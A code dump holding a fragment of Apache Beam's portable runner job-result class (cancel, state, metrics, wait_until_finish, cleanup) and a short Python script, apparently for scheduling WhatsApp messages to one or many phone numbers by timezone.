self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
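  # The two converters above rely on the JobState enum names matching the
  # runner.PipelineState constants, e.g. JobState.Enum 'RUNNING' maps to
  # PipelineState.RUNNING and back; states that exist in only one of the two
  # enums will not round-trip.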
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
    # Keep only messages that carry a message_response, then select those
    # reported at error importance.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
    :return: The final state of the pipeline, or the last observed state if
      the duration elapses first.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
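  # Illustrative call (assumes `result` is an instance of this class): wait at
  # most two minutes, then cancel if the job has not reached a terminal state.
  #
  #   from apache_beam.runners.runner import PipelineState
  #   state = result.wait_until_finish(duration=120000)  # milliseconds
  #   if not PipelineState.is_terminal(state):
  #       result.cancel()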
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
    exception = None
    for callback in self._cleanup_callbacks:
      try:
        callback()
      except Exception as e:
        # Keep running the remaining callbacks, but remember the first failure
        # so it can be re-raised once cleanup is complete.
        exception = exception or e
    self._cleanup_callbacks = ()
    if exception:
      raise exception
|
PyAutoWp.py
|
import main
import check
from threading import Thread
check.windowCheck()
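# Notes on the flow below (descriptive only; main.py and check.py are not
# shown here, so their behaviour is inferred from how they are called):
#   - main.wcbo / main.wcb appear to prompt the user, with wcbo validating the
#     answer against the list of allowed choices.
#   - main.differentCountryTimer seems to map a phone number to a timezone
#     name (returning "Etc/Unknown" when it cannot), and main.timer is assumed
#     to block until the requested send time is reached in that timezone.
#   - For option 1 with a timer, one thread is started per distinct timezone;
#     the polling loop below sends a timezone's batch as soon as its thread
#     finishes.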
while True:
a = main.wcbo("Please choose an option:\n1-I will send my message to many people.\n2-I will send my message to 1 person.", "1 or 2: ", ["1","2"])
if a == "1":
phoneNumberData = check.phoneListCheck()
phoneNumberData = main.contacts_df_edit(phoneNumberData)
message = check.messageCheck()
        use_timer = check.timerCheck()
        if use_timer:
t = main.wcb("Enter the date and time to send the message", "(example: day.month.year 21:00): ")
tz = list(map(main.differentCountryTimer,phoneNumberData["Phone Number"]))
phoneNumberData["tz"] = tz
tz_list = list(set(tz))
th_list = []
pnd = []
for i in tz_list:
if i == "Etc/Unknown":
continue
pnd.append(phoneNumberData[phoneNumberData.tz == i])
th_list.append(Thread(target = main.timer, args = (i,t)))
for i in range(len(th_list)):
th_list[i].start()
print(pnd)
tfl = [None] * len(th_list)
x = 0
while True:
if x == len(th_list):
x = 0
if len(th_list) == 0:
break
tfl[x] = (th_list[x].is_alive())
print(tfl)
if False in tfl:
main.sendMultipleMessage(pnd[x],message)
th_list.pop(x)
tfl.pop(x)
pnd.pop(x)
x = x +1
        elif use_timer is False:
main.sendMultipleMessage(phoneNumberData,message)
break
elif a == "2":
message = check.messageCheck()
phoneNumber = check.phoneNumberCheck()
main.sendMessage(str(phoneNumber),message)
break
print("Message sent.")
|